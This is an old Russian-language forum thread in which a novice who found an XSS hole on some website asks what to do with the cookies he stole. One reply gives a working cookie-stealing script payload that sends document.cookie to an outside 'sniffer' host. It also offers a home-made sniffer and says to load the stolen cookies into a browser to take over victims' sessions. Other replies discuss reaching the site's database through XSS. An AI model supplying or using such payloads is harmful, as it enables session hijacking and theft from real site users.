Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
XSS JavaScript Кукисы, Помогите пж новичку
 
Нашел уязвимость. Через XSS можно сунуть любой скрипт, ткаим образом достал кукисы, но что с ними сделать??? Если можно, еще один вопрос, можно-ли на JS написать код фтп-сервера прям на странице? Если можно,то как?Плиз. помогите
 
Цитата
Нашел уязвимость. Через XSS можно сунуть любой скрипт, ткаим образом достал кукисы, но что с ними сделать??? Если можно, еще один вопрос, можно-ли на JS написать код фтп-сервера прям на странице? Если можно,то как?Плиз. помогите
прочел дважды. так и не понел что вы хотите :o
а cookies надо есть  :)
Изменено: ZER0 - 21.10.2008 20:56:29
 
FTP сервер написать прямо на странице методами JS нельзя.
Но например при помощи JS можно подгрузить актив икс объект, который может выполнять функции FTP сервера.
Конечно же пользователь должен разрешить выполнение этого актив икс объекта
 
а через XSS можно доступ к БД сайта как нибудь получить?
 
:sensored:
 
:sensored:
Изменено: FixET - 27.10.2008 23:16:53
 
vobshem,esli ty ugonyaesh kuki,to ispolzui:
1)javascript
//cherez nego posylaesh po location.href + cookie zhertvu i vse: primer:
"><script>location.href="http://sniffer.com"+escape(document.cookie)</script>
2)sniffer
vot moi poprobui,sam kodil (cookie v parametre "cookie",redirekt [kuda zhertva potom poidet] v parametre "to",zashifrovannom base64 [shifrator tozhe prilagaetsa]:
http://www.securitylab.ru/forum/forum20/topic47938/messages/
3)operu
chtoby vstavit nagrablennoe
udachi.
 
:sensored:
Страницы: 1
Читают тему